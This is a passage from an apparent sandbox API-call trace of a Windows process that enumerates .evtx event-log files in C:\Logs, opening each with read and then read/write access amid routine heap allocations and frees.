lpNewFilePointer=0x0) returned 1 [0087.164] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0087.165] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0087.165] CloseHandle (hObject=0x424) returned 1 [0087.165] AreFileApisANSI () returned 1 [0087.165] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0087.165] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x64) returned 0x46978 [0087.165] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x46978, cchWideChar=50 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx") returned 50 [0087.165] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx" (normalized: "c:\\logs\\microsoft-windows-settingsync%4debug.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.165] GetFileType (hFile=0x424) returned 0x1 [0087.165] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46978 | out: hHeap=0x20000) returned 1 [0087.165] CloseHandle (hObject=0x424) returned 1 [0087.165] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0087.165] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0087.165] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71890 [0087.166] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0087.166] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71890 | out: hHeap=0x20000) returned 1 [0087.166] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0087.166] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0087.166] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0087.166] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0087.166] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0087.166] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0087.166] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0087.166] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0087.166] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0087.166] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0087.166] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71c38 [0087.166] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0087.166] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0087.166] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71c38 | out: hHeap=0x20000) returned 1 [0087.166] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0087.166] AreFileApisANSI () returned 1 [0087.166] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0087.166] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x64) returned 0x45fd8 [0087.166] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x45fd8, cchWideChar=50 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx") returned 50 [0087.166] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx" (normalized: "c:\\logs\\microsoft-windows-settingsync%4debug.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1fe2941, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd1fe2941, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x101000)) returned 1 [0087.166] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45fd8 | out: hHeap=0x20000) returned 1 [0087.166] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0087.166] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0087.166] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0087.166] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.166] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.166] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1fe2941, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd1fe2941, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-SettingSync%4Operational.evtx", cAlternateFileName="MI36AA~1.EVT")) returned 1 [0087.166] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0087.166] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0087.166] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0087.167] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68e00 [0087.167] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0087.167] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45e88 [0087.167] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68e00 | out: hHeap=0x20000) returned 1 [0087.167] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0087.167] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71550 [0087.167] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0087.167] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71550 | out: hHeap=0x20000) returned 1 [0087.167] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0087.167] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45e88 | out: hHeap=0x20000) returned 1 [0087.167] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0087.167] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0087.167] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0087.167] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0087.167] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0087.167] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0087.167] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0087.167] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0087.167] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0087.167] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71828 [0087.167] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0087.167] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.167] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0087.167] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.167] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0087.167] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0087.167] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0087.167] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.167] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.167] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.167] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.167] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0087.167] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71828 | out: hHeap=0x20000) returned 1 [0087.167] AreFileApisANSI () returned 1 [0087.168] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx", lpUsedDefaultChar=0x0) returned 56 [0087.168] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0087.168] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.168] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.168] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0087.168] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0087.168] AreFileApisANSI () returned 1 [0087.168] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0087.168] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0087.168] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x75b70, cchWideChar=56 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx") returned 56 [0087.168] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-settingsync%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.168] GetFileType (hFile=0x424) returned 0x1 [0087.168] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0087.168] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0087.168] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0087.169] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0087.169] CloseHandle (hObject=0x424) returned 1 [0087.169] AreFileApisANSI () returned 1 [0087.169] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0087.169] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0087.169] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x76200, cchWideChar=56 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx") returned 56 [0087.169] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-settingsync%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.169] GetFileType (hFile=0x424) returned 0x1 [0087.169] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0087.169] CloseHandle (hObject=0x424) returned 1 [0087.169] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0087.170] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0087.170] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71890 [0087.170] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0087.170] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71890 | out: hHeap=0x20000) returned 1 [0087.170] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0087.170] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0087.170] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0087.170] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0087.170] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0087.170] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71550 [0087.170] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0087.170] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71550 | out: hHeap=0x20000) returned 1 [0087.170] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0087.170] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0087.170] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0087.170] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0087.170] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0087.170] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0087.170] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0087.170] AreFileApisANSI () returned 1 [0087.170] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0087.170] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0087.170] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x76020, cchWideChar=56 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx") returned 56 [0087.170] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-settingsync%4operational.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1fe2941, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd1fe2941, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0087.170] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0087.170] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0087.170] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0087.170] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0087.170] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.170] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.170] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3852b12, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd3852b12, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-Shell-Core%4ActionCenter.evtx", cAlternateFileName="MI2E2E~1.EVT")) returned 1 [0087.171] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0087.171] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0087.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0087.171] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x690d0 [0087.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0087.171] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45fd8 [0087.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x690d0 | out: hHeap=0x20000) returned 1 [0087.171] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0087.171] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0087.171] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71828 [0087.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0087.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0087.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45fd8 | out: hHeap=0x20000) returned 1 [0087.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71828 | out: hHeap=0x20000) returned 1 [0087.171] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d040 [0087.171] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0087.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0087.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0087.171] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0087.171] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0087.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0087.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0087.171] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0087.171] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0087.171] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0087.171] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0087.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0087.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0087.171] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0087.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0087.171] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.171] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.171] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.171] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.266] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0087.266] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0087.266] AreFileApisANSI () returned 1 [0087.266] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx", lpUsedDefaultChar=0x0) returned 56 [0087.267] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0087.267] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.267] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.267] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0087.267] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0087.267] AreFileApisANSI () returned 1 [0087.267] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0087.267] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0087.267] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x76020, cchWideChar=56 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx") returned 56 [0087.267] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx" (normalized: "c:\\logs\\microsoft-windows-shell-core%4actioncenter.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.267] GetFileType (hFile=0x424) returned 0x1 [0087.267] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0087.267] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0087.268] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0087.268] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0087.268] CloseHandle (hObject=0x424) returned 1 [0087.268] AreFileApisANSI () returned 1 [0087.268] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0087.268] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0087.268] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x75d50, cchWideChar=56 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx") returned 56 [0087.268] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx" (normalized: "c:\\logs\\microsoft-windows-shell-core%4actioncenter.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.268] GetFileType (hFile=0x424) returned 0x1 [0087.268] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0087.269] CloseHandle (hObject=0x424) returned 1 [0087.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) 